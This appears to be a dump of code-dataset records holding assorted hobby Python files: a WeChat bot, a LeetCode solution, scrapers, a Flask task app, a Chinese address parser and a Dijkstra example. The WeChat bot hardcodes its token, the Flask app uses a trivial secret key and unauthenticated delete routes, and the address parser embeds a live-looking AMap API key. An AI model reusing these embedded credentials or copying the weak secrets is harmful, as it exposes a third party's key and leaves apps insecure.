\"\"\"Returns translations for a TafData object\"\"\"\n data = []\n return data\n","sub_path":"avwx/parsing/translate/gfs.py","file_name":"gfs.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653955123","text":"# -*- coding: utf-8 -*-\nimport hashlib\nimport web\nimport lxml\nimport time\nimport os\nimport json\nimport requests\nfrom lxml import etree\n\nfrom HTMLParser import HTMLParser\n\nresult = {\"name\": [], \"cover\": [], \"desc\": [], \"link\": []}\n\ndef get_page():\n\thtml = requests.get(\"http://t.cn/Rvm4xgc\").text\n\tlength = len(html)\n\tcount = 0\n\tfor i in 
range(0, length-4):\n\t\tif html[i] == '<' and html[i+1] == 't' and html[i+2] == 'a' and html[i+3] == 'b':\n\t\t\tcount += 1\n\t\t\tif count == 7:\n\t\t\t\tbreak\n\tstart = i\n\tfor j in range(i, length-4):\n\t\tif html[j] == 'b' and html[j+1] == 'l' and html[j+2] == 'e' and html[j+3] == '>':\n\t\t\tbreak\n\tend = j+4\n\treturn html[start:end]\n\nclass MyHTMLParser(HTMLParser):\n\tdef __init__(self): \n\t\tHTMLParser.__init__(self) \n\t\tself.tdcount = 0\n\t\tself.imgcount = 0\n\t\tself.acount = 0\n\tdef handle_starttag(self, tag, attrs):\n\t\tif tag == 'td':\n\t\t\tself.tdcount += 1\n\t\tif tag == 'img':\n\t\t\tself.imgcount += 1\n\t\t\tif self.imgcount == 1 or self.imgcount == 3:\n\t\t\t\tfor (variable, value) in attrs:\n\t\t\t\t\tif variable == \"src\":\n\t\t\t\t\t\tresult[\"cover\"].append(value)\n\t\tif tag == 'a':\n\t\t\tself.acount += 1\n\t\t\tif self.acount == 3 or self.acount == 5:\n\t\t\t\tfor (variable, value) in attrs:\n\t\t\t\t\tif variable == \"href\":\n\t\t\t\t\t\tresult[\"link\"].append(\"http://www.amazon.cn\" + value)\n\tdef handle_data(self, data):\n\t\tif self.tdcount == 2 or self.tdcount == 4:\n\t\t\tresult[\"name\"].append(data)\n\t\tif self.tdcount == 5 or self.tdcount == 7:\n\t\t\tpos = data.find('')\n\t\t\tresult[\"desc\"].append(data[0:pos])\n\ndef parse(html):\n\tparser = MyHTMLParser()\n\tparser.feed(html)\n\ndef build_html():\n\treturn '' \\\n\t\t\t+ '
'+ result[\"name\"][0] + '  ' + result[\"desc\"][2] + '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' + result[\"desc\"][0] + '' \\\n\t\t\t+ ''+ result[\"name\"][1] + '  ' + result[\"desc\"][5] + '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' + result[\"desc\"][3] + '
' \\\n\t\t\t+ ''\n\nclass WeixinInterface:\n\tdef __init__(self):\n\t\tself.app_root = os.path.dirname(__file__)\n\t\tself.templates_root = os.path.join(self.app_root, 'templates')\n\t\tself.render = web.template.render(self.templates_root)\n\tdef GET(self):\n\t\t#获取输入参数\n\t\tdata = web.input()\n\t\tsignature=data.signature\n\t\ttimestamp=data.timestamp\n\t\tnonce=data.nonce\n\t\techostr=data.echostr\n\t\t#自己的token\n\t\ttoken=\"gcc2012\" #这里改写你在微信公众平台里输入的token\n\t\t#字典序排序\n\t\tlist=[token,timestamp,nonce]\n\t\tlist.sort()\n\t\tsha1=hashlib.sha1()\n\t\tmap(sha1.update,list)\n\t\thashcode=sha1.hexdigest()\n\t\t#sha1加密算法 \n\n\t\t#如果是来自微信的请求,则回复echostr\n\t\tif hashcode == signature:\n\t\t\treturn echostr\n\tdef POST(self): \n\t\t#接收微信的请求内容\n\t\tdata = web.data()\n\t\t#解析XML内容\n\t\troot = etree.fromstring( data )\n\t\tchild = list( root )\n\t\trecv = {}\n\t\tfor i in child:\n\t\t\trecv[i.tag] = i.text\n\t\t\n\t\ttextxml = \"\"\"\n\t\t\t\n\t\t\t\n\t\t\t%s\n\t\t\t\n\t\t\t\t\n\t\t\t\"\"\"\n\n\t\tif recv['MsgType'] == 'event':\n\t\t\tif recv['Event'] == 'subscribe':\n\t\t\t\twelcome = 'Thanks to follow, reply any text to view Kindle special books today!'\n\t\t\t\treturn textxml % (recv['FromUserName'], recv['ToUserName'],recv['CreateTime'],welcome)\n\n\t\ttextandpic = \"\"\"\n\t\t\t\n\t\t\t\n\t\t\t%s\n\t\t\t\n\t\t\t2\n\t\t\t\n\t\t\t\n\t\t\t<![CDATA[%s]]> \n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t<![CDATA[%s]]> \n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\"\"\"\n\t\tparse(get_page())\n\t\techostr = textandpic % (recv['FromUserName'], recv['ToUserName'],recv['CreateTime'], result[\"name\"][0], result[\"desc\"][0], result[\"cover\"][0], result[\"link\"][0], result[\"name\"][1], result[\"desc\"][1], result[\"cover\"][1], result[\"link\"][1])\n\t\treturn echostr\n\n\n\n","sub_path":"weixinInterface.py","file_name":"weixinInterface.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"235155068","text":"from typing import List\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n def make_adjacent_zero(i, j, row_len, col_len):\n grid[i][j] = 0\n # up\n if i > 0 and grid[i - 1][j] == '1':\n make_adjacent_zero(i - 1, j, row_len, col_len)\n # down\n if i < row_len - 1 and grid[i + 1][j] == '1':\n make_adjacent_zero(i + 1, j, row_len, col_len)\n # left\n if j > 0 and grid[i][j - 1] == '1':\n make_adjacent_zero(i, j - 1, row_len, col_len)\n # right\n if j < col_len - 1 and grid[i][j + 1] == '1':\n make_adjacent_zero(i, j + 1, row_len, col_len)\n\n count = 0\n row_len, col_len = len(grid), len(grid[0]) if len(grid) > 0 else 0\n for i in range(row_len):\n for j in range(col_len):\n if grid[i][j] == '1':\n count += 1\n make_adjacent_zero(i, j, row_len, col_len)\n return count\n\n\ninput = \"\"\"\"\"\"\ninput = input.split('\\n')\ninput = [list(row) for row in input]\nfor i in input:\n for j in i:\n print(j, sep='', end='')\n print('\\n')\nprint(Solution().numIslands(input))\n\n","sub_path":"leetcode-journey/0200_number_of_islands_medium.py","file_name":"0200_number_of_islands_medium.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602861074","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef extract(url):\r\n\treq = requests.get(url)\r\n\tsoup = BeautifulSoup(req.content,'html.parser')\r\n\r\n\tlis = 
soup.find('div',{\"class\":\"lister-list\"}).findAll('div',{\"class\":\"lister-item\"})\r\n\r\n\tyear = soup.find('h3',{\"class\":\"lister-item-header\"}).findAll('span',{\"class\":\"lister-item-index\"})\r\n\tfor yr in year:\r\n\t\tprint (yr)\r\n\r\n\tlist_movies = []\r\n\r\n\tfor item in lis:\r\n\t\tmovie = {}\r\n\t\t#movie['number'] = item.find('div',{\"class\":\"lister-item-content\"}).findAll('span',{\"class\":\"lister-item-index\"},text=True)\r\n\t\t#movie['number'] = item.find('span',{\"class\":\"lister-item-index\"}).findAll(text=True)\r\n\t\tmovie['title'] = item.h3.a.text\r\n\t\tmovie['number'] = item.find('span',{\"class\":\"lister-item-year\"})\r\n\t\t#movie['desc'] =_all\r\n\t\t#movi[0]e['desc']['cert'] = item.find('p',{\"class\":\"text-muted\"}).findAll('span',{\"class\":\"certificate\"})\r\n\t\tlist_movies.append(movie)\r\n\r\n\tprint (list_movies)\r\n\r\nif __name__=='__main__':\r\n\turl = 'http://www.imdb.com/search/title?count=100&title_type=feature,tv_series&ref_=nv_wl_img_2'\r\n\textract(url)\r\n\r\n","sub_path":"extract_movies.py","file_name":"extract_movies.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302913064","text":"from flask import Flask,render_template,url_for,request,redirect,make_response\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_login import LoginManager,login_required\r\nfrom datetime import datetime\r\n\r\n\r\napp=Flask(__name__)\r\n\r\napp.secret_key=\"super secret key\"\r\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///Syukanmanage.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\r\n\r\ndb=SQLAlchemy(app)\r\n\r\nlogin_manager=LoginManager()\r\nlogin_manager.login_view='auth.login'\r\nlogin_manager.init_app(app)\r\n\r\nfrom app.models.user import User\r\nfrom app.models.task import Post,Report\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.query.get(int(user_id))\r\n\r\nfrom app.views.auth import auth\r\napp.register_blueprint(auth)\r\nfrom app.report_check import rcheck\r\napp.register_blueprint(rcheck)\r\nfrom app.reportgraph import graph\r\napp.register_blueprint(graph)\r\n\r\n@app.route('/',methods=['GET','POST'])\r\n@login_required\r\ndef index():\r\n if request.method=='GET':\r\n posts=Post.query.order_by(Post.due).all()\r\n return render_template('index.html',posts=posts)\r\n else:\r\n title=request.form.get('title')\r\n detail=request.form.get('detail')\r\n due=request.form.get('due')\r\n name=request.form.get('name')\r\n\r\n due=datetime.strptime(due,'%Y-%m-%d')\r\n new_post=Post(title=title,detail=detail,due=due,name=name)\r\n\r\n db.session.add(new_post)\r\n db.session.commit()\r\n\r\n return redirect('/')\r\n\r\n\r\n@app.route('/report/',methods=['GET','POST'])\r\ndef report(id):\r\n post=Post.query.get(id)\r\n report=Report.query.get(id)\r\n if request.method=='GET':\r\n post=Post.query.get(id)\r\n return render_template('report.html',post=post)\r\n else:\r\n date=request.form.get('date')\r\n comment=request.form.get('comment')\r\n times=request.form.get('times')\r\n date=datetime.strptime(date,'%Y-%m-%d')\r\n name=request.form.get('name')\r\n pid=post.id\r\n\r\n new_report=Report(date=date,comment=comment,times=times,name=name,pid=pid)\r\n\r\n db.session.add(new_report)\r\n db.session.commit()\r\n return redirect('/')\r\n return render_template('detail.html',post=post)\r\n\r\n\r\n@app.route('/create')\r\ndef create():\r\n return 
render_template('create.html')\r\n\r\n@app.route('/detail/')\r\ndef read(id):\r\n post=Post.query.get(id)\r\n return render_template('detail.html',post=post)\r\n\r\n@app.route('/update/',methods=['GET','POST'])\r\ndef update(id):\r\n post=Post.query.get(id)\r\n if request.method=='GET':\r\n return render_template('update.html',post=post)\r\n else:\r\n post.title=request.form.get('title')\r\n post.detail=request.form.get('detail')\r\n post.due=datetime.strptime(request.form.get('due'),'%Y-%m-%d')\r\n post.name=request.form.get('name')\r\n\r\n db.session.commit()\r\n return redirect('/')\r\n return render_template('detail.html',post=post)\r\n\r\n@app.route('/delete/')\r\ndef delete(id):\r\n post=Post.query.get(id)\r\n\r\n db.session.delete(post)\r\n db.session.commit()\r\n return redirect('/')\r\n\r\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"448598970","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nprovince_list = ['江苏', '重庆市', '天津', '河南省', '辽宁省', '云南省', '吉林', '黑龙江', '重庆', '甘肃省', '江西', '广东省', '福建省', '新疆维吾尔自治区',\n '浙江', '湖南', '上海市', '山东省', '福建', '黑龙江省', '海南', '浙江省', '湖北省', '安徽', '四川', '香港特别行政区', '青海', '台湾省', '河北',\n '云南', '山西省', '广西壮族自治区', '四川省', '吉林省', '西藏自治区', '河南', '上海', '山西', '江苏省', '台湾', '山东', '陕西', '江西省',\n '甘肃', '陕西省', '贵州', '内蒙古自治区', '天津市', '青海省', '宁夏回族自治区', '辽宁', '贵州省', '澳门特别行政区', '安徽省', '湖北', '湖南省',\n '北京', '河北省', '海南省', '广东', '北京市', '宁夏', '澳门', '新疆', '广西', '内蒙古', '西藏', '香港', '湖北省']\ncity_list = ['泉州市', '肇庆市', '抚州市', '日照市', '乌兰察布市', '金昌市', '赣州市', '榆林市', '吉林市', '黑河市', '韶关市', '三沙市', '桂林市', '黄山市',\n '常州市', '喀什地区', '沧州市', '鸡西市', '扬州市', '贵阳市', '济宁市', '武汉市', '日喀则市', '九江市', '保山市', '景德镇市', '成都市', '松原市',\n '梅州市', '巴中市', '阜阳市', '南平市', '金华市', '锡林郭勒盟', '丽江市', '荆州市', '湘西土家族苗族自治州', '玉林市', '驻马店市', '通辽市', '延边朝鲜族自治州',\n '乌海市', '马鞍山市', '临沂市', '昌吉回族自治州', '大庆市', '镇江市', '乐山市', '潍坊市', '铜川市', '和田地区', '黄南藏族自治州', '遵义市', '广安市',\n '威海市', '厦门市', '庆阳市', '红河哈尼族彝族自治州', '咸宁市', '临夏回族自治州', '合肥市', '鞍山市', '巴彦淖尔市', '中卫市', '盐城市', '滁州市', '六盘水市',\n '达州市', '大兴安岭地区', '舟山市', '梧州市', '崇左市', '吐鲁番市', '呼和浩特市', '中山市', '海西蒙古族藏族自治州', '运城市', '吉安市', '汕尾市', '延安市',\n '毕节市', '楚雄彝族自治州', '安阳市', '广州市', '河源市', '新余市', '天水市', '清远市', '石嘴山市', '鹤壁市', '聊城市', '黔东南苗族侗族自治州', '宿州市',\n '衡水市', '宣城市', '安顺市', '北京市', '恩施土家族苗族自治州', '重庆市', '亳州市', '酒泉市', '赤峰市', '宜宾市', '德宏傣族景颇族自治州', '常德市', '丽水市',\n '资阳市', '长治市', '无锡市', '博尔塔拉蒙古自治州', '菏泽市', '荆门市', '天津市', '辽源市', '雅安市', '牡丹江市', '襄阳市', '大同市', '随州市', '兰州市',\n '郴州市', '信阳市', '甘南藏族自治州', '淮南市', '郑州市', '平顶山市', '龙岩市', '焦作市', '双鸭山市', '百色市', '南通市', '白城市', '池州市', '汉中市',\n '自贡市', '盘锦市', '沈阳市', '普洱市', '遂宁市', '邢台市', '儋州市', '杭州市', '苏州市', '衡阳市', '淮北市', '承德市', '海北藏族自治州', '定西市',\n '通化市', '文山壮族苗族自治州', '吴忠市', '云浮市', '南昌市', '商洛市', '武威市', '宿迁市', '铜仁市', '惠州市', '银川市', '德阳市', '十堰市', '阿拉善盟',\n '长春市', '巴音郭楞蒙古自治州', '曲靖市', '阿克苏地区', '岳阳市', '防城港市', '朝阳市', '益阳市', '贵港市', '凉山彝族自治州', '白银市', '嘉峪关市', '莆田市',\n '温州市', '德州市', '烟台市', '来宾市', '咸阳市', '那曲市', '齐齐哈尔市', '滨州市', '珠海市', '潮州市', '怀化市', '永州市', '上饶市', '伊犁哈萨克自治州',\n '汕头市', '晋城市', '兴安盟', '廊坊市', '上海市', '渭南市', '东莞市', '周口市', '湖州市', '株洲市', '甘孜藏族自治州', '佛山市', '绥化市', '泸州市',\n '昌都市', '徐州市', '攀枝花市', '抚顺市', '湛江市', '铜陵市', '淮安市', '石家庄市', '平凉市', '本溪市', '哈密市', '营口市', '台州市', '黄��市',\n '宁波市', '萍乡市', '玉树藏族自治州', '固原市', '芜湖市', '黄冈市', '朔州市', '南宁市', '临汾市', '深圳市', '阜新市', '青岛市', '柳州市', '商丘市',\n '忻州市', '洛阳市', '南京市', '海东市', '眉山市', '钦州市', '娄底市', '海南藏族自治州', '鄂州市', '三亚市', '莱芜市', '宁德市', '嘉兴市', '吕梁市',\n '迪庆藏族自治州', '邵阳市', '香港特别行政区', '拉萨市', '张家界市', '太原市', '克拉玛依市', 
'西双版纳傣族自治州', '濮阳市', '河池市', '晋中市', '鹰潭市',\n '丹东市', '陇南市', '长沙市', '许昌市', '张掖市', '唐山市', '安康市', '贺州市', '蚌埠市', '孝感市', '宜春市', '铁岭市', '怒江傈僳族自治州', '六安市',\n '东营市', '澳门特别行政区', '黔南布依族苗族自治州', '三明市', '衢州市', '阿里地区', '漯河市', '茂名市', '泰安市', '广元市', '昭通市', '新乡市', '安庆市',\n '枣庄市', '北海市', '塔城地区', '阿勒泰地区', '七台河市', '海口市', '开封市', '乌鲁木齐市', '秦皇岛市', '佳木斯市', '阳江市', '邯郸市', '张家口市',\n '包头市', '哈尔滨市', '保定市', '泰州市', '阳泉市', '克孜勒苏柯尔克孜自治州', '林芝市', '淄博市', '江门市', '湘潭市', '大连市', '伊春市', '三门峡市',\n '内江市', '南充市', '黔西南布依族苗族自治州', '大理白族自治州', '阿坝藏族羌族自治州', '福州市', '锦州市', '鄂尔多斯市', '鹤岗市', '临沧市', '济南市', '绍兴市',\n '玉溪市', '宜昌市', '宝鸡市', '南阳市', '揭阳市', '辽阳市', '四平市', '西安市', '昆明市', '漳州市', '西宁市', '果洛藏族自治州', '绵阳市', '山南市',\n '葫芦岛市', '泉州', '肇庆', '抚州', '日照', '乌兰察布', '金昌', '赣州', '榆林', '吉林', '黑河', '韶关', '三沙', '桂林', '黄山', '常州', '沧州',\n '鸡西', '扬州', '贵阳', '济宁', '武汉', '日喀则', '九江', '保山', '景德镇', '成都', '松原', '梅州', '巴中', '阜阳', '南平', '金华', '丽江',\n '荆州', '玉林', '驻马店', '通辽', '乌海', '马鞍山', '临沂', '大庆', '镇江', '乐山', '潍坊', '铜川', '遵义', '广安', '威海', '厦门', '庆阳',\n '咸宁', '合肥', '鞍山', '巴彦淖尔', '中卫', '盐城', '滁州', '六盘水', '达州', '舟山', '梧州', '崇左', '吐鲁番', '呼和浩特', '中山', '运城',\n '吉安', '汕尾', '延安', '毕节', '安阳', '广州', '河源', '新余', '天水', '清远', '石嘴山', '鹤壁', '聊城', '宿州', '衡水', '宣城', '安顺',\n '北京', '重庆', '亳州', '酒泉', '赤峰', '宜宾', '常德', '丽水', '资阳', '长治', '无锡', '菏泽', '荆门', '天津', '辽源', '雅安', '牡丹江',\n '襄阳', '大同', '随州', '兰州', '郴州', '信阳', '淮南', '郑州', '平顶山', '龙岩', '焦作', '双鸭山', '百色', '南通', '白城', '池州', '汉中',\n '自贡', '盘锦', '沈阳', '普洱', '遂宁', '邢台', '儋州', '杭州', '苏州', '衡阳', '淮北', '承德', '定西', '通化', '吴忠', '云浮', '南昌',\n '商洛', '武威', '宿迁', '铜仁', '惠州', '银川', '德阳', '十堰', '长春', '曲靖', '岳阳', '防城港', '朝阳', '益阳', '贵港', '白银', '嘉峪关',\n '莆田', '温州', '德州', '烟台', '来宾', '咸阳', '那曲', '齐齐哈尔', '滨州', '珠海', '潮州', '怀化', '永州', '上饶', '汕头', '晋城', '廊坊',\n '上海', '渭南', '东莞', '周口', '湖州', '株洲', '佛山', '绥化', '泸州', '昌都', '徐州', '攀枝花', '抚顺', '湛江', '铜陵', '淮安', '石家庄',\n '平凉', '本溪', '哈密', '营口', '台州', '黄石', '宁波', '萍乡', '固原', '芜湖', '黄冈', '朔州', '南宁', '临汾', '深圳', '阜新', '青岛',\n '柳州', '商丘', '忻州', '洛阳', '南京', '海东', '眉山', '钦州', '娄底', '鄂州', '三亚', '莱芜', '宁德', '嘉兴', '吕梁', '邵阳', '拉萨',\n '张家界', '太原', '克拉玛依', '濮阳', '河池', '晋中', '鹰潭', '丹东', '陇南', '长沙', '许昌', '张掖', '唐山', '安康', '贺州', '蚌埠', '孝感',\n '宜春', '铁岭', '六安', '东营', '三明', '衢州', '漯河', '茂名', '泰安', '广元', '昭通', '新乡', '安庆', '枣庄', '北海', '七台河', '海口',\n '开封', '乌鲁木齐', '秦皇岛', '佳木斯', '阳江', '邯郸', '张家口', '包头', '哈尔滨', '保定', '泰州', '阳泉', '林芝', '淄博', '江门', '湘潭',\n '大连', '伊春', '三门峡', '内江', '南充', '福州', '锦州', '鄂尔多斯', '鹤岗', '临沧', '济南', '绍兴', '玉溪', '宜昌', '宝鸡', '南阳', '揭阳',\n '辽阳', '四平', '西安', '昆明', '漳州', '西宁', '绵阳', '山南', '葫芦岛']\n#提取姓名\ndef getname(line):\n name = re.search(r'^[\\u4e00-\\u9fa5]{2,5}', line)\n return name\n#提取电话号码\ndef getphone(line):\n phone = re.search('(\\d{11})', line)\n return phone\n#提取地址\ndef getaddress(line,name,phone):\n if(name):\n address = re.sub(name.group(), '', line)\n address = re.sub(',', '', address)\n address = re.sub('\\.', '', address)\n address = re.sub(phone.group(), '', address)\n return address\n#对地址进行分类\ndef addr(address, name, phone):\n#分化省级\n province = re.search('[\\u4e00-\\u9fa5]{2,7}?(?:省|自治区)', address)\n Isprovince = 0\n if (province != None):\n length = len(province.group())\n loc = address.find(province.group())\n address2 = address[loc+length:]\n province = province.group()\n else:\n for state in province_list:\n if (re.search(state, address) != None):\n break\n if (re.search(state, address) == None):\n Isprovince = 1\n length = len(state)\n loc = address.find(state)\n address2 = address[loc + length:]\n if state == \"北京\" or state == \"上海\" or state == \"天津\" or state == \"重庆\" or state == 
\"北京市\" or state == \"上海市\" or state == \"天津市\" or state == \"重庆市\":\n if len(address) < 3 or address[2] != \"市\":\n address = address[:2] + \"市\" + address[2:]\n else :\n state = state[:2]\n province = state\n address2 = address\n elif state == \"澳门\" or state == \"香港\" :\n state = state + \"特别行政区\" \n province = state\n elif state == \"澳门特别行政区\" or state == \"香港特别行政区\":\n province = state\n elif state == \"宁夏\" or state == \"新疆\" or state == \"西藏\" or state == \"内蒙古\" or state == \"广西壮族自治区\" or state == \"新疆维吾尔自治区\" or state == \"西藏自治区\" or state == \"内蒙古自治区\":\n if state[-1] != \"区\":\n if state[1] == \"藏\":\n state = state + '自治区'\n if state[1] == \"西\":\n state = state + '壮族自治区'\n if state[1] == \"疆\":\n state = state + '维吾尔自治区'\n if state[2] == \"古\":\n state = state + '自治区'\n province = state\n elif Isprovince == 1:\n province = \"\"\n address2 = address\n else:\n province = state+\"省\"\n \n\n\n#分化市级\n for city in city_list:\n if (re.search(city, address2) != None):\n break\n if re.search(city, address2) == None:\n c_city = \"\"\n address3 = address2\n else:\n c_city = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:市|地区|自治州|盟))', address2)\n if(c_city == None):\n length = len(city)\n loc = address2.find(city)\n address3 = address2[loc + length:]\n if city == \"喀什\" or city == \"和田\" or city == \"大兴安岭\" or city == \"阿勒泰\" or city == \"阿克苏\" or city == \"阿里\" or city == \"塔城\":\n c_city = city + \"地区\"\n elif city == \"锡林郭勒\" or city == \"阿拉善\" or city == \"兴安\":\n c_city = city + \"盟\"\n else:\n c_city = city + \"市\"\n else:\n c_city = c_city.group()\n c_city = re.search( city , c_city)\n if (c_city != None):\n c_city = c_city.group()\n length = len(c_city)\n loc = address2.find(c_city)\n address3 = address2[loc + length:]\n if(not(c_city[-1] == \"市\" or c_city[-1] == \"盟\" or ( c_city[-1] == \"州\" and c_city[-2] == \"治\") or ( c_city[-1] == \"区\" and c_city[-2] == \"地\") )):\n if c_city == \"喀什\" or c_city == \"和田\" or c_city == \"大兴安岭\" or c_city == \"阿勒泰\" or c_city == \"阿克苏\" or c_city == \"阿里\" or city == \"塔城\":\n c_city = c_city + \"地区\"\n elif city == \"锡林郭勒\" or c_city == \"阿拉善\" or c_city == \"兴安\":\n c_city = c_city + \"盟\"\n else:\n c_city = c_city + \"市\"\n else:\n length = len(city)\n loc = address2.find(city)\n address3 = address2[:loc] + address2[loc + length:]\n\n#分化区级\n r_region = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:市|区|县|海域|岛|旗))', address3)\n if (r_region != None):\n length = len(r_region.group())\n loc = address3.find(r_region.group())\n address4 = address3[loc + length:]\n r_region = r_region.group()\n else:\n r_region = \"\"\n address4 = address3\n\n\n#分化镇级\n country = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:街道|镇|乡|园))', address4)\n if (country != None):\n length = len(country.group())\n loc = address4.find(country.group())\n address5 = address4[loc + length:]\n country = country.group()\n else:\n country = \"\"\n address5 = address4\n addressfirst = address5\n \n#分化街级\n street = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:路|街|巷|道|胡同))', address5)\n if (street != None):\n length = len(street.group())\n loc = address5.find(street.group())\n address6 = address5[loc + length:]\n street = street.group()\n else:\n street = \"\"\n address6 = address5\n\n \n#分化号码\n number = re.search('(\\d{1,7}?(?:号))', address6)\n if (number != None):\n length = len(number.group())\n loc = address6.find(number.group())\n address7 = address6[loc + length:]\n number = number.group()\n else:\n number = \"\"\n address7 = address6\n\n#输出结果\n import json\n if (flag.group() == '1'):\n result = {\"姓名\": 
name.group(), \"手机\": phone.group(), \"地址\": [province,c_city,r_region,country,addressfirst]}\n elif (flag.group() == '2'): \n result = {\"姓名\": name.group(), \"手机\": phone.group(), \"地址\": [province,c_city,r_region,country,street,number,address7]}\n else:\n result = {\"姓名\": name.group(), \"手机\": phone.group(), \"地址\": [province,c_city,r_region,country,street,number,address7]}\n autoCorrAll(result,line)\n print(json.dumps(result, ensure_ascii=False),)\n\n#补全信息,第三难度\ndef autoCorrAll(result,line):\n line = re.sub('#', '', line)\n parameters = { 'address' : line, 'key' : '3487c6b6caf2d1119ce727e60803a716' }\n base = 'https://restapi.amap.com/v3/geocode/geo'\n data = requests.get(base,parameters)\n result_json = data.json()\n j_w = result_json[\"geocodes\"][0][\"location\"]\n data = requests.get(\n \"http://restapi.amap.com/v3/geocode/regeo?output=JSON&location=\"+j_w+\"&key=3487c6b6caf2d1119ce727e60803a716&radius=0&extensions=base\")\n result_json = data.json()\n info = result_json[\"regeocode\"][\"addressComponent\"]\n province = info[\"province\"]\n city = info[\"city\"]\n region = info[\"district\"]\n country = info[\"township\"]\n street = info[\"streetNumber\"][\"street\"]\n number = info[\"streetNumber\"][\"number\"]\n detail = []\n detail.append(province)\n detail.append(city)\n detail.append(region)\n detail.append(country)\n detail.append(street)\n detail.append(number)\n for i in range(4):\n if result[\"地址\"][i] == \"\" and detail[i]!=[]:\n result[\"地址\"][i] = detail[i]\n return result\n\n\nimport re\nimport requests\nwhile 1:\n line=input()\n if line=='END':\n break\n flag = re.search(r'^\\d',line)\n line = re.sub('.!', '', line)\n line = line.strip()\n name = getname(line)\n phone = getphone(line)\n address = getaddress(line, name, phone)\n addr(address, name, phone)\n","sub_path":"031702527.py","file_name":"031702527.py","file_ext":"py","file_size_in_byte":17760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"256498760","text":"def find_lowest_cost_node(costs, processed):\n lowest_cost = float(\"inf\")\n lowest_cost_node = None\n for node in costs:\n cost = costs[node]\n if cost < lowest_cost and node not in processed:\n lowest_cost = cost\n lowest_cost_node = node\n return lowest_cost_node\n\n\ndef dijkstra(graph, costs, parents):\n processed = []\n node = find_lowest_cost_node(costs, processed)\n while node is not None:\n cost = costs[node]\n neighbors = graph[node]\n for n in neighbors:\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost:\n costs[n] = new_cost\n parents[n] = node\n processed.append(node)\n node = find_lowest_cost_node(costs, processed)\n\n\n\n# the graph\ngraph = {} # {}\ngraph[\"start\"] = {} # { \"start\": {} } \ngraph[\"start\"][\"a\"] = 6 # { \"start\": { \"a\": 6 } } \ngraph[\"start\"][\"b\"] = 2 # { \"start\": { \"a\": 6, \"b\": 2 } } \n\ngraph[\"a\"] = {} # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": {} } \ngraph[\"a\"][\"fin\"] = 1 # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 } } \n\ngraph[\"b\"] = {} # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": {} } \ngraph[\"b\"][\"a\"] = 3 # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": { \"a\": 3 } } \ngraph[\"b\"][\"fin\"] = 5 # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": { \"a\": 3, \"fin\": 5 } } \n\ngraph[\"fin\"] = {} # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": { \"a\": 3, \"fin\": 5 }, \"fin\": {} } \n\n# the costs table\ninfinity = 
float(\"inf\") # int(\"inf\") is NOT valid!\ncosts = {} # {}\ncosts[\"a\"] = 6 # { \"a\": 6 }\ncosts[\"b\"] = 2 # { \"a\": 6, \"b\": 2 }\ncosts[\"fin\"] = infinity # { \"a\": 6, \"b\": 2, \"fin\": infinity }\n\n# the parents table\nparents = {} # {}\nparents[\"a\"] = \"start\" # { \"a\": \"start\" }\nparents[\"b\"] = \"start\" # { \"a\": \"start\", \"b\": \"start\" }\nparents[\"fin\"] = None # { \"a\": \"start\", \"b\": \"start\", \"fin\": None }\n\ndijkstra(graph, costs, parents)\nprint(costs)\nprint(parents)\n","sub_path":"grokking/Ch07/dijkstra_algorithm.py","file_name":"dijkstra_algorithm.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"652616581","text":"import sys\nsys.stdin = open(\"C급/input.txt\")\n\ndef DFS(n, sol, move):\n global head\n # print(n, sol, move)\n if sol > head:\n return \n if n==N:\n res=sol\n if move+oil[N] > dis:\n res+=oil_time[N-1]\n if res < head:\n head=res\n # print(res)\n return\n if move+oil[n] <= dis:\n DFS(n+1, sol, move+oil[n]) # 충전 안하고 가는 경우\n DFS(n+1, sol+oil_time[n], 0) # 충전하고 가는 경우\n else:\n DFS(n, sol+oil_time[n-1], 0)\n\ndis = int(input())\nN=int(input())\noil = list(map(int,input().split()))\noil_time = list(map(int,input().split()))\n\nhead=9999\nDFS(0, 0, 0)\nprint(head)\n\n\n# 